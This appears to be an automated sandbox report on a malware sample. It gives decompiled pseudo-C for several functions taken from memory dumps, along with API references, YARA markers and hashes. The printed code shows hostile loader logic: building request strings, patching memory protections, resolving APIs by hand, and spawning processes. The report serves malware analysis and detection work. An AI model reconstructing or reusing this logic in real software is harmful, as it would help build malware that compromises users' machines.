				_t157 = wsprintfA(_t145, _t3, 3, 0x3d144, _t66, _t65, _t64, _t63,  *0x277d02c,  *0x277d004, _t62);
				_t70 = E02777C34();
				_t71 =  *0x277d230; // 0x27ba5a8
				_t4 = _t71 + 0x277e662; // 0x74707526
				_t74 = wsprintfA(_t157 + _t145, _t4, _t70);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t74;
				if(_a8 != 0) {
					_t141 =  *0x277d230; // 0x27ba5a8
					_t8 = _t141 + 0x277e66d; // 0x732526
					_t144 = wsprintfA(_t158 + _t145, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t144;
				}
				_t75 = E02775728(_t146);
				_t76 =  *0x277d230; // 0x27ba5a8
				_t10 = _t76 + 0x277e38a; // 0x6d697426
				_t79 = wsprintfA(_t158 + _t145, _t10, _t75, _t156);
				_t147 = _a4;
				_t159 = _t158 + _t79;
				_t180 = _t147 -  *0x277d2f0; // 0x0
				_t82 =  *0x277d230; // 0x27ba5a8
				_t15 = _t82 + 0x277e33b; // 0x74636126
				_t160 = _t159 + wsprintfA(_t159 + _t145, _t15, 0 | _t180 == 0x00000000);
				_t86 =  *0x277d278; // 0x4f395e0
				_t175 = _t174 + 0x1c;
				if(_t86 != 0) {
					_t137 =  *0x277d230; // 0x27ba5a8
					_t17 = _t137 + 0x277e8ea; // 0x3d736f26
					_t140 = wsprintfA(_t160 + _t145, _t17, _t86);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t140;
				}
				_t87 =  *0x277d288; // 0x4f395b0
				if(_t87 != 0) {
					_t134 =  *0x277d230; // 0x27ba5a8
					_t19 = _t134 + 0x277e685; // 0x73797326
					wsprintfA(_t160 + _t145, _t19, _t87);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x277d2dc; // 0x4f39630
				_t89 = E02778A9B(0x277d00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t89;
				if(_t89 == 0) {
					L28:
					RtlFreeHeap( *0x277d1f0, _t167, _t145); // executed
					return _a20;
				} else {
					_t92 = RtlAllocateHeap( *0x277d1f0, 0, 0x800); // executed
					_a8 = _t92;
					if(_t92 == 0) {
						L27:
						HeapFree( *0x277d1f0, _t167, _v12);
						goto L28;
					}
					E02777C61(GetTickCount());
					_t96 =  *0x277d2dc; // 0x4f39630
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x277d2dc; // 0x4f39630
					__imp__(_t100 + 0x40);
					_t102 =  *0x277d2dc; // 0x4f39630
					_t163 = E0277140D(1, _t156, _t145,  *_t102);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						RtlFreeHeap( *0x277d1f0, _t167, _a8); // executed
						goto L27;
					}
					StrTrimA(_t163, 0x277c2c4);
					_push(_t163);
					_t108 = E027774AF();
					_v8 = _t108;
					if(_t108 == 0) {
						L25:
						RtlFreeHeap( *0x277d1f0, _t167, _t163); // executed
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					 *_t168(_a8, _t163);
					_t113 = E0277745D(0, _a8);
					_a4 = _t113;
					if(_t113 == 0) {
						_a20 = 8;
						L23:
						E027753A8();
						L24:
						RtlFreeHeap( *0x277d1f0, 0, _v8); // executed
						_t167 = 0;
						goto L25;
					}
					_t117 = E02776F41(_t145, 0xffffffffffffffff, _t163,  &_v16); // executed
					_a20 = _t117;
					if(_t117 == 0) {
						_t171 = _v16;
						_t124 = E0277492B(_t171, _a4, _a12, _a16); // executed
						_a20 = _t124;
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 0x80))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						_t131 =  *_t171;
						 *((intOrPtr*)( *_t131 + 8))(_t131);
						E02774C31(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t119 = _a12;
							if(_t119 != 0) {
								_t164 =  *_t119;
								_t169 =  *_a16;
								wcstombs( *_t119,  *_t119,  *_a16);
								_t122 = E02771000(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t122;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E02774C31(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x02773cc4
0x02773cc4
0x02773cc4
0x02773ccd
0x02773cd2
0x02773cd9
0x02773cdb
0x02773cdb
0x02773ce8
0x02773cf3
0x02773cf6
0x02773d01
0x02773d04
0x02773d09
0x02773d0c
0x02773d11
0x02773d14
0x02773d20
0x02773d2d
0x02773d2f
0x02773d35
0x02773d3a
0x02773d45
0x02773d47
0x02773d4a
0x02773d50
0x02773d52
0x02773d5a
0x02773d65
0x02773d67
0x02773d6a
0x02773d6a
0x02773d6c
0x02773d73
0x02773d78
0x02773d83
0x02773d85
0x02773d88
0x02773d8c
0x02773d96
0x02773d9b
0x02773da8
0x02773daa
0x02773daf
0x02773db4
0x02773db7
0x02773dbc
0x02773dc7
0x02773dc9
0x02773dcc
0x02773dcc
0x02773dce
0x02773dd5
0x02773dd8
0x02773ddd
0x02773de7
0x02773de9
0x02773de9
0x02773dec
0x02773dfa
0x02773dff
0x02773e03
0x02773e06
0x02773fd2
0x02773fda
0x02773fe7
0x02773e0c
0x02773e18
0x02773e20
0x02773e23
0x02773fc2
0x02773fcc
0x00000000
0x02773fcc
0x02773e2f
0x02773e34
0x02773e3d
0x02773e4e
0x02773e52
0x02773e5b
0x02773e61
0x02773e6e
0x02773e75
0x02773e7e
0x02773e84
0x02773fb2
0x02773fbc
0x00000000
0x02773fbc
0x02773e90
0x02773e96
0x02773e97
0x02773e9e
0x02773ea1
0x02773fa4
0x02773fac
0x00000000
0x02773fac
0x02773eaa
0x02773eb0
0x02773eb9
0x02773ec2
0x02773ec8
0x02773ecf
0x02773ed6
0x02773ed9
0x02773fea
0x02773f8c
0x02773f8c
0x02773f91
0x02773f9c
0x02773fa2
0x00000000
0x02773fa2
0x02773ee3
0x02773eea
0x02773eed
0x02773ef2
0x02773efd
0x02773f02
0x02773f05
0x02773f0b
0x02773f11
0x02773f17
0x02773f1a
0x02773f20
0x02773f23
0x02773f28
0x02773f2c
0x02773f2c
0x02773f38
0x02773f44
0x02773f48
0x02773f4a
0x02773f4f
0x02773f51
0x02773f56
0x02773f5b
0x02773f68
0x02773f70
0x02773f73
0x02773f73
0x02773f4f
0x00000000
0x02773f3a
0x02773f3e
0x02773f75
0x02773f78
0x02773f81
0x00000000
0x00000000
0x00000000
0x00000000
0x02773f81
0x02773f40
0x00000000
0x02773f40
0x02773f38

APIs

GetTickCount.KERNEL32 ref: 02773CDB
wsprintfA.USER32 ref: 02773D28
wsprintfA.USER32 ref: 02773D45
wsprintfA.USER32 ref: 02773D65
wsprintfA.USER32 ref: 02773D83
wsprintfA.USER32 ref: 02773DA6
wsprintfA.USER32 ref: 02773DC7
wsprintfA.USER32 ref: 02773DE7
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02773E18
GetTickCount.KERNEL32 ref: 02773E29
RtlEnterCriticalSection.NTDLL(04F395F0), ref: 02773E3D
RtlLeaveCriticalSection.NTDLL(04F395F0), ref: 02773E5B

Part of subcall function 0277140D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,02776C79,00000000,04F39630), ref: 02771438
Part of subcall function 0277140D: lstrlen.KERNEL32(00000000,?,00000000,02776C79,00000000,04F39630), ref: 02771440
Part of subcall function 0277140D: strcpy.NTDLL ref: 02771457
Part of subcall function 0277140D: lstrcat.KERNEL32(00000000,00000000), ref: 02771462
Part of subcall function 0277140D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02776C79,?,00000000,02776C79,00000000,04F39630), ref: 0277147F

StrTrimA.SHLWAPI(00000000,0277C2C4,?,04F39630), ref: 02773E90

Part of subcall function 027774AF: lstrlen.KERNEL32(04F3887A,00000000,00000000,00000000,02776CA0,00000000), ref: 027774BF
Part of subcall function 027774AF: lstrlen.KERNEL32(?), ref: 027774C7
Part of subcall function 027774AF: lstrcpy.KERNEL32(00000000,04F3887A), ref: 027774DB
Part of subcall function 027774AF: lstrcat.KERNEL32(00000000,?), ref: 027774E6

lstrcpy.KERNEL32(00000000,?), ref: 02773EB0
lstrcat.KERNEL32(00000000,?), ref: 02773EC2
lstrcat.KERNEL32(00000000,00000000), ref: 02773EC8

Part of subcall function 0277745D: lstrlen.KERNEL32(?,0277D2E0,75187FC0,00000000,0277534B,?,?,?,?,?,027770B5,?), ref: 02777466
Part of subcall function 0277745D: mbstowcs.NTDLL ref: 0277748D
Part of subcall function 0277745D: memset.NTDLL ref: 0277749F

wcstombs.NTDLL ref: 02773F5B

Part of subcall function 0277492B: SysAllocString.OLEAUT32(00000000), ref: 0277496C
Part of subcall function 0277492B: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 027749EE
Part of subcall function 0277492B: StrStrIW.SHLWAPI(00000000,006E0069), ref: 02774A2D

Part of subcall function 02774C31: RtlFreeHeap.NTDLL(00000000,00000000,02775130,00000000,?,?,00000000,?,?,?,?,?,?,02778792,00000000), ref: 02774C3D

RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 02773F9C
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 02773FAC
RtlFreeHeap.NTDLL(00000000,00000000,?,04F39630), ref: 02773FBC
HeapFree.KERNEL32(00000000,?), ref: 02773FCC
RtlFreeHeap.NTDLL(00000000,?), ref: 02773FDA

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 2871901346-0
Opcode ID: 3b7da162a9b863b5253193569916255f10a90a68abf3d16d3f4eb2e17c0f755b
Instruction ID: 883ad24d9ec5e9f60714ace5eba938cea5f06665b6005b0326ead2aed80cda15
Opcode Fuzzy Hash: 3b7da162a9b863b5253193569916255f10a90a68abf3d16d3f4eb2e17c0f755b
Instruction Fuzzy Hash: 3BA15771940109AFCF22DF68DC88EAA7BB9FF09354B158865F809D7210DB34D969DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05403D13, Relevance: 22.6, APIs: 15, Instructions: 130memorysynchronizationCOMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,0540D948), ref: 05403D3C
RtlDeleteCriticalSection.NTDLL(0542E240), ref: 05403D6F
RtlDeleteCriticalSection.NTDLL(0542E260), ref: 05403D76
CloseHandle.KERNEL32(?,?,0540D948), ref: 05403DA5
ReleaseMutex.KERNEL32(00000308,00000000,?,?,?,0540D948), ref: 05403DB6
FindCloseChangeNotification.KERNELBASE(?,?,0540D948), ref: 05403DC2
ResetEvent.KERNEL32(00000000,00000000,?,?,?,0540D948), ref: 05403DCE
CloseHandle.KERNEL32(?,?,0540D948), ref: 05403DDA
SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,0540D948), ref: 05403DE0
SleepEx.KERNEL32(00000064,00000001,?,?,0540D948), ref: 05403DF4
HeapFree.KERNEL32(00000000,00000000,?,?,0540D948), ref: 05403E17
RtlRemoveVectoredExceptionHandler.NTDLL(042F05B8), ref: 05403E50
SleepEx.KERNELBASE(00000064,00000001,?,?,0540D948), ref: 05403E6C
FindCloseChangeNotification.KERNELBASE(05958548,?,?,0540D948), ref: 05403E93
LocalFree.KERNEL32(?,?,0540D948), ref: 05403EA3

Part of subcall function 0541FD0C: GetVersion.KERNEL32(?,00000000,7519F720,?,05403D2D,00000000,?,?,?,0540D948), ref: 0541FD30
Part of subcall function 0541FD0C: GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,05403D2D,00000000,?,?,?,0540D948), ref: 0541FD44
Part of subcall function 0541FD0C: GetProcAddress.KERNEL32(00000000), ref: 0541FD4B

Part of subcall function 05413AA9: RtlEnterCriticalSection.NTDLL(0542E260), ref: 05413AB3
Part of subcall function 05413AA9: RtlLeaveCriticalSection.NTDLL(0542E260), ref: 05413AEF

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalSectionSleep$Handle$ChangeDeleteFindFreeNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 2858272568-0
Opcode ID: eb5e96a076d9435d3730e443851e2ed4b545cda1bd8b0bea4cb623bbaee560d9
Instruction ID: a8d59d21f71775e2fc0aaf40f5cdd8e92dfe186e431ea78efa026df9c95aa012
Opcode Fuzzy Hash: eb5e96a076d9435d3730e443851e2ed4b545cda1bd8b0bea4cb623bbaee560d9
Instruction Fuzzy Hash: 57418631620235DFD734AF65DCC6EFA7FA9BB00740BA4097AF60593280CF7198568B66

Uniqueness

Uniqueness Score: -1.00%

Function 027737CA, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E027737CA(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x277d1f8);
					_v20 = 0;
					_v16 = 0;
					L0277AEE0();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x277d224; // 0x2d8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x277d204 = 5;
						} else {
							_t69 = E02774C46(); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x277d218 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E027780F6( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E027753BE(_t73, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x277d1fc);
							goto L21;
						} else {
							__eflags =  *0x277d200; // 0x1
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E027753A8();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x277d200);
								L21:
								L0277AEE0();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							RtlFreeHeap( *0x277d1f0, 0, _t54); // executed
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x027737ca
0x027737dc
0x027737df
0x027737eb
0x027737f3
0x027737f6
0x0277395c
0x027737fc
0x027737fc
0x027737fe
0x02773803
0x02773804
0x0277380a
0x0277380d
0x02773810
0x0277381e
0x02773829
0x0277382c
0x0277382e
0x0277383b
0x02773845
0x02773849
0x0277384c
0x02773851
0x0277385c
0x0277385c
0x02773853
0x02773853
0x0277385a
0x00000000
0x00000000
0x0277385a
0x02773866
0x00000000
0x02773869
0x0277386d
0x02773878
0x02773878
0x0277387f
0x02773884
0x0277388b
0x02773894
0x0277389a
0x0277389d
0x027738a4
0x027738a7
0x00000000
0x00000000
0x027738a9
0x027738ac
0x027738af
0x027738b2
0x00000000
0x027738b4
0x027738be
0x027738c3
0x027738c3
0x00000000
0x027738f1
0x027738f1
0x027738f6
0x02773915
0x02773917
0x0277391c
0x0277391d
0x00000000
0x027738f8
0x027738f8
0x027738fe
0x00000000
0x02773900
0x02773900
0x02773905
0x02773907
0x0277390c
0x0277390d
0x02773923
0x02773923
0x0277392b
0x02773936
0x02773939
0x02773944
0x02773946
0x02773948
0x0277394b
0x00000000
0x02773951
0x00000000
0x02773951
0x0277394b
0x027738fe
0x00000000
0x027738f6
0x027738c6
0x027738c8
0x027738cb
0x027738cc
0x027738cc
0x027738d0
0x027738da
0x027738da
0x027738e0
0x027738e3
0x027738e3
0x027738e9
0x027738e9
0x02773966
0x00000000

APIs

memset.NTDLL ref: 027737DF
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 027737EB
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02773810
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 0277382C
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02773845
RtlFreeHeap.NTDLL(00000000,00000000), ref: 027738DA
CloseHandle.KERNEL32(?), ref: 027738E9
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02773923
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02777A05), ref: 02773939
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02773944

Part of subcall function 02774C46: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F39328,00000000,?,7519F710,00000000,7519F730), ref: 02774C95
Part of subcall function 02774C46: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F39360,?,00000000,30314549,00000014,004F0053,04F3931C), ref: 02774D32
Part of subcall function 02774C46: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02773858), ref: 02774D44

GetLastError.KERNEL32 ref: 02773956

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 112da1a673b4a87b537accb3a804a5df48fa7188ef623606c0118e179146ef15
Instruction ID: a3d79029ba52feb6faa8fc97bb5be0663b523dfee6decf94d032332bae26cfe8
Opcode Fuzzy Hash: 112da1a673b4a87b537accb3a804a5df48fa7188ef623606c0118e179146ef15
Instruction Fuzzy Hash: 0E515A71D01229ABDF21DF95DC85AEEBFB9EF09364F208656F810B2180D7709654DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0540E3A7, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E3F4
VirtualProtect.KERNEL32(00000000,00000000,00000040,-00000020,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E406
lstrcpy.KERNEL32(00000000,?), ref: 0540E415
VirtualProtect.KERNEL32(00000000,00000000,?,-00000020,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E426
VirtualProtect.KERNELBASE(?,00000005,00000040,-00000020,0542A508,00000018,05403862,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E45C
VirtualProtect.KERNELBASE(?,00000004,?,-00000020,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E477
VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,0542A508,00000018,05403862,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E48C
VirtualProtect.KERNELBASE(?,00000004,00000040,-00000020,0542A508,00000018,05403862,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E4B9
VirtualProtect.KERNELBASE(?,00000004,?,-00000020,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E4D3
GetLastError.KERNEL32(?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E4DA

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: 2970e2803fd5bb9e91213f84db85c093ca72594dabd33b6459c511494bb583e6
Instruction ID: f0740ef4b9127ae6d25279c3d02d31461cb76ba1a07aa39cdc1c0a441033a91b
Opcode Fuzzy Hash: 2970e2803fd5bb9e91213f84db85c093ca72594dabd33b6459c511494bb583e6
Instruction Fuzzy Hash: 83414E719007199FDB31CF65CC44EEBBBB9FB08310F50896AE652A66D0D734E8259B20

Uniqueness

Uniqueness Score: -1.00%

Function 02777E3F, Relevance: 15.1, APIs: 10, Instructions: 111
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E02777E3F(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t42;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t52;
				void* _t60;
				intOrPtr* _t65;
				intOrPtr _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t39 = E027740AF(__ecx,  *(_t69 + 0xc),  &_v12,  &_v16); // executed
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t69 + 8),  *(_t69 + 0xc));
				_t42 = _v12(_v12);
				_v8 = _t42;
				if(_t42 == 0 && ( *0x277d218 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t49 =  *0x277d230; // 0x27ba5a8
					_t18 = _t49 + 0x277e55b; // 0x73797325
					_t51 = E0277A590(_t18);
					_v12 = _t51;
					if(_t51 == 0) {
						_v8 = 8;
					} else {
						_t52 =  *0x277d230; // 0x27ba5a8
						_t20 = _t52 + 0x277e73d; // 0x4f38ce5
						_t21 = _t52 + 0x277e0af; // 0x4e52454b
						_t65 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t65 == 0) {
							_v8 = 0x7f;
						} else {
							_t71 = __imp__;
							_v108 = 0x44;
							 *_t71(0);
							_t60 =  *_t65(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32); // executed
							 *_t71(1);
							if(_t60 == 0) {
								_v8 = GetLastError();
							} else {
								FindCloseChangeNotification(_v28); // executed
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x277d1f0, 0, _v12);
					}
				}
				_t74 = _v16;
				 *((intOrPtr*)(_t74 + 0x18))( *((intOrPtr*)(_t74 + 0x1c))( *_t74));
				E02774C31(_t74);
				goto L12;
			}

0x02777e48
0x02777e48
0x02777e56
0x02777e5f
0x02777e62
0x02777f77
0x02777f7e
0x02777f7e
0x02777e71
0x02777e7c
0x02777e81
0x02777e84
0x02777e99
0x02777e9f
0x02777ea0
0x02777ea3
0x02777ea9
0x02777eac
0x02777eb1
0x02777eb9
0x02777ec0
0x02777ec7
0x02777eca
0x02777f5e
0x02777ed0
0x02777ed0
0x02777ed5
0x02777edc
0x02777ef0
0x02777ef4
0x02777f45
0x02777ef6
0x02777ef6
0x02777efd
0x02777f04
0x02777f1c
0x02777f22
0x02777f26
0x02777f40
0x02777f28
0x02777f31
0x02777f36
0x02777f36
0x02777f26
0x02777f56
0x02777f56
0x02777eca
0x02777f65
0x02777f6e
0x02777f72
0x00000000

APIs

Part of subcall function 027740AF: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,02777E5B,?,?,?,?,00000000,00000000), ref: 027740D4
Part of subcall function 027740AF: GetProcAddress.KERNEL32(00000000,7243775A), ref: 027740F6
Part of subcall function 027740AF: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0277410C
Part of subcall function 027740AF: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02774122
Part of subcall function 027740AF: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02774138
Part of subcall function 027740AF: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0277414E

memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 02777E71
memset.NTDLL ref: 02777EAC

Part of subcall function 0277A590: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,02773592,73797325), ref: 0277A5A1
Part of subcall function 0277A590: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0277A5BB

GetModuleHandleA.KERNEL32(4E52454B,04F38CE5,73797325), ref: 02777EE3
GetProcAddress.KERNEL32(00000000), ref: 02777EEA
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 02777F04
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 02777F22
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02777F31
CloseHandle.KERNEL32(?), ref: 02777F36
GetLastError.KERNEL32 ref: 02777F3A
HeapFree.KERNEL32(00000000,?), ref: 02777F56

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Wow64$Handle$CloseEnableEnvironmentExpandModuleRedirectionStrings$ChangeErrorFindFreeHeapLastNotificationmemcpymemset
String ID:
API String ID: 2409638872-0
Opcode ID: 0c683e8951321f033422a1bfc874700a83c09adad024fc6c443526b34503992d
Instruction ID: a2def7b684355727515af0695dd40a5c497610914324125213a39a02244fcc9a
Opcode Fuzzy Hash: 0c683e8951321f033422a1bfc874700a83c09adad024fc6c443526b34503992d
Instruction Fuzzy Hash: 03416772901219BFCF22AFA4DC48EDEBFB9EF09344F108456E605E7110D7749A5ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027777EB, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E027777EB(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E02778B76();
				if(_t27 != 0) {
					_t77 =  *0x277d214; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x277d214 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x277d134(0, 2);
				_v20 = _t28;
